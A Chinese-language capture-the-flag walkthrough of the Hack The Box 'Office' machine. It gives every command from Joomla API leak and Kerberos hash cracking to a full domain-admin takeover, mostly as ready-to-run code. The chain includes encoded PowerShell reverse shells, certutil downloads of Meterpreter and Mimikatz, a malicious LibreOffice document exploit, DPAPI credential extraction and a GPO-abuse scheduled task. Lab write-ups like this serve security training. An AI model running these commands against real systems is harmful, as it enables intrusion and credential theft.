[Meachines][Hard]Office
字数 1434 2025-08-19 12:42:16
Office 靶机渗透测试详细教学文档
1. 信息收集阶段
1.1 初始扫描
使用 Nmap 进行初始扫描:
nmap -sC -sV 10.10.11.3 --min-rate 1000
发现信息:
- 识别到 CMS: Joomla
- 添加主机名到 hosts 文件:
echo '10.10.11.3 office.htb DC.office.htb' >> /etc/hosts
1.2 目录发现
- 发现 robots.txt 目录泄露
- 访问 Joomla 后台:
http://10.10.11.3/administrator/index.php
1.3 漏洞利用
利用 CVE-2023-23752 未授权访问漏洞:
http://10.10.11.3/api/index.php/v1/config/application?public=true
获取到数据库凭据:
- 用户名: root
- 密码: H0lOgrams4reTakIng0Ver754!
2. Kerberos 用户枚举
2.1 安装 Kerbrute
sudo apt install golang-go
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
chmod 777 kerbrute_linux_amd64
2.2 枚举用户
./kerbrute_linux_amd64 userenum --dc DC.office.htb -d office.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o recore.log
grep -oP '\S+(?=@office\.htb)' recore.log | sort | uniq > Users.txt
3. SMB 共享访问
3.1 使用 CrackMapExec 验证凭据
crackmapexec smb 10.10.11.3 -u Users.txt -p 'H0lOgrams4reTakIng0Ver754!' --shares
发现 dwolfe 用户可以访问 SMB 共享资源。
3.2 访问 SMB 共享
smbclient //10.10.11.3/SOC\ Analysis -U dwolfe%H0lOgrams4reTakIng0Ver754!
smb: \> get Latest-System-Dump-8fbc124d.pcap ./Main.pacap
4. Kerberos 票据破解
4.1 分析 PCAP 文件
发现 Kerberos 预认证数据,包含 AES256 加密的密文:
a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
4.2 构建 Hashcat 格式
格式:$krb5pa$18$(USERNAME)$(DC_Server)$(Cipher)
使用用户 tstark 构建:
$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
4.3 使用 Hashcat 破解
hashcat -m 19900 hash /usr/share/wordlists/rockyou.txt
获取凭据:
- 用户名: tstark
- 密码: playboy69
5. 获取初始访问权限
5.1 使用获取的凭据登录 Joomla 后台
5.2 反弹 Shell
生成 PowerShell 反弹 shell 代码(使用 https://www.revshells.com/)
执行:
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA1ACIALAAxADAAMAAzADIAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
5.3 获取用户 Flag
type c:\\Users\tstark\Desktop\user.txt
输出:50a96aa18344772ec1c10135ff5141d8
6. 权限提升
6.1 使用 RunasCs 提权
下载 RunasCs:
wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
python3 -m http.server 80
在靶机执行:
cd c:\\Users\Public\Downloads
certutil -urlcache -split -f http://10.10.16.15/RunasCs.exe RunasCs.exe
.\RunasCs.exe tstark playboy69 powershell -r 10.10.16.15:10033
6.2 设置 Chisel 隧道
在 Kali:
chisel server --port 5564 --reverse
在靶机:
cd C:\Users\Public\Downloads
certutil -urlcache -split -f http://10.10.16.15/chisel.exe chisel.exe
.\chisel.exe client 10.10.16.15:5564 R:8083:127.0.0.1:8083
访问 http://127.0.0.1:8083
6.3 利用 LibreOffice 漏洞 (CVE-2023-2255)
生成恶意 ODT 文件:
git clone https://github.com/elweth-sec/CVE-2023-2255.git
python3 CVE-2023-2255.py --cmd 'C:\Users\Public\reverse.exe' --output 'exploit.odt'
生成 Meterpreter 载荷:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.15 LPORT=10035 -f exe -o reverse.exe
msfconsole -x 'use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 10.10.16.15;set LPORT 10035;run'
在靶机下载 reverse.exe:
cd C:\Users\Public
certutil -urlcache -split -f http://10.10.16.15/reverse.exe reverse.exe
上传 exploit.odt 到简历申请表
6.4 获取 PPotts 用户凭据
定位凭据文件:
Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\
使用 Mimikatz 提取主密钥:
certutil -urlcache -split -f http://10.10.16.15/mimikatz.exe mimikatz.exe
.\mimikatz.exe
在 Mimikatz 中执行:
dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb" /rpc
dpapi::cred /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4" /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
获取 HHogan 用户凭据:
- 用户名: HHogan
- 密码: H4ppyFtW183#
7. 域管理员权限获取
7.1 使用 Evil-WinRM 连接
vim /etc/proxychains4.conf
chisel server -p 9002 --reverse --socks5
在靶机:
cd C:\Users\Public\Downloads
.\chisel.exe client 10.10.16.15:9002 R:socks
7.2 使用 SharpGPOAbuse 提权
下载 SharpGPOAbuse:
wget https://github.com/byronkg/SharpGPOAbuse/releases/download/1.0/SharpGPOAbuse.exe
在靶机:
certutil -urlcache -split -f http://10.10.16.15/SharpGPOAbuse.exe SharpGPOAbuse.exe
添加计算机任务:
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "s-h4ck13" --Author office\Administrator --Command "cmd.exe" --Arguments "/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA1ACIALAAxADAAMAAzADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" --GPOName "Default Domain Controllers Policy" --Force
gpupdate /force
7.3 获取 Root Flag
type c:\\Users\Administrator\Desktop\root.txt
输出:5224918ae4a25196417ca0a559a084e6
8. 关键参考资料
-
Windows DPAPI 提取密码:
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords -
Mimikatz DPAPI 模块:
https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey